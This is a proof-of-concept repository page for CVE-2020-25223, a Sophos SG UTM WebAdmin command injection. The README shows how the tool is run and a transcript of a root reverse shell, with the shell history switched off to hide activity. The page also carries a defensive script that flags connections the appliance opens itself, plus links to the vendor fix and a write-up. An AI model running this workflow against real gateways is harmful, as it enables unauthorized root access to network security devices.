
CVE-2020-25223 PoC: Sophos SG UTM OS command injection vulnerability

Related vulnerability
Title: Sophos SG UTM OS command injection vulnerability (CVE-2020-25223)
Description: Sophos SG UTM is a security gateway from the UK company Sophos, used to protect computer nodes inside a local network. Sophos SG UTM WebAdmin has an OS command injection vulnerability that an attacker can exploit to execute code remotely. The following product versions are affected: v9.705 MR5, v9.607 MR7 and v9.511 MR11.

Introduction
# sophucked
CVE-2020-25223 RCE PoC, gets a reverse shell. Pre-auth. Implemented this quickly as it was needed to unify some threat magnets.


## Example Use:
```
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
# 
```

## Scanning/Detection
Not implemented in this, just use the [nuclei template](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-25223.yaml).

## Post-exploitation notes
These boxes ship with a Python interpreter and a fairly full-featured Linux environment. Amazing potential for post-exploitation.

## Blue team notes
I'm sure someone who cares can fill this in. Bitter (a subset of "blue team twitter") will probably do so shortly. I mean, it can't be that hard to detect an unencrypted reverse shell beaconing out from your Unified Threat Manager box right?
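One way to start on the detection side, as an added example that is not part of the original README and not Sophos's own log format: the callback in the usage example above goes to port 80, so a destination-port allowlist alone does nothing; what stands out is that the connection is originated by the appliance itself rather than forwarded for a client. The log lines, the UTM address and the expected-egress table below are constructed for the example.

```python
"""Flag TCP connections that the UTM appliance itself opens to hosts it is
not expected to talk to. Input is constructed, iptables-style syslog text;
UTM_WAN_IP and EXPECTED_EGRESS are assumptions for this example."""
from typing import List

UTM_WAN_IP = "203.0.113.10"                     # hypothetical external address of the UTM
EXPECTED_EGRESS = {"198.51.100.5": {443},       # hypothetical update/licensing servers
                   "198.51.100.6": {443}}

# Constructed sample records (not Sophos output). Line 2 is forwarded client
# traffic, line 3 is an appliance-originated callback on port 80.
SAMPLE_LOG = """\
utm kernel: IN= OUT=eth1 SRC=203.0.113.10 DST=198.51.100.5 PROTO=TCP SPT=51234 DPT=443 SYN
utm kernel: IN=eth0 OUT=eth1 SRC=10.0.0.23 DST=93.184.216.34 PROTO=TCP SPT=40001 DPT=80 SYN
utm kernel: IN= OUT=eth1 SRC=203.0.113.10 DST=192.0.2.77 PROTO=TCP SPT=38812 DPT=80 SYN
utm kernel: IN= OUT=eth1 SRC=203.0.113.10 DST=198.51.100.5 PROTO=TCP SPT=51234 DPT=443 ACK
"""


def parse_line(line: str) -> dict:
    """Split an iptables-style record into key=value fields plus a set of TCP flags."""
    _, _, rest = line.partition("kernel: ")
    fields: dict = {"FLAGS": set()}
    for tok in rest.split():
        key, sep, val = tok.partition("=")
        if sep:
            fields[key] = val
        else:
            fields["FLAGS"].add(key)
    return fields


def is_locally_originated(f: dict) -> bool:
    """No input interface (not forwarded) and sourced from the UTM's own address."""
    return f.get("IN", "") == "" and f.get("SRC") == UTM_WAN_IP


def is_new_tcp(f: dict) -> bool:
    """Only the opening SYN of a connection, so each session is reported once."""
    return f.get("PROTO") == "TCP" and "SYN" in f["FLAGS"] and "ACK" not in f["FLAGS"]


def suspicious_egress(log: str) -> List[dict]:
    """Return appliance-originated new connections whose destination is not allowlisted."""
    findings = []
    for line in log.splitlines():
        if "kernel: " not in line:
            continue
        f = parse_line(line)
        if not (is_locally_originated(f) and is_new_tcp(f)):
            continue
        dst, dpt = f.get("DST"), int(f.get("DPT", 0))
        if dpt in EXPECTED_EGRESS.get(dst, set()):
            continue
        findings.append({"dst": dst, "dpt": dpt, "spt": int(f["SPT"])})
    return findings


if __name__ == "__main__":
    for hit in suspicious_egress(SAMPLE_LOG):
        print(f"appliance-originated connection to {hit['dst']}:{hit['dpt']} not in allowlist")
```

Feeding real appliance logs through this requires matching the record format and keeping the allowlist honest; the point is to alert on origin, not on port.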

## Fixing the bug
Someone (presumably from Sophos) sent this over; it's the official fix link. Go update your UTM. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce

## References, etc.

Third party reference (bug details): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

Direct complaints to Sophos, who somehow thought passing user input to `open()` in Perl was a good idea in the 21st century. 
File snapshot

/data/pocs/edafa1580bfbbf6d082f53ffc09eae241e7f28ce
├── README.md (1.6K)
└── sophucked.py (2.2K)
0 directories, 2 files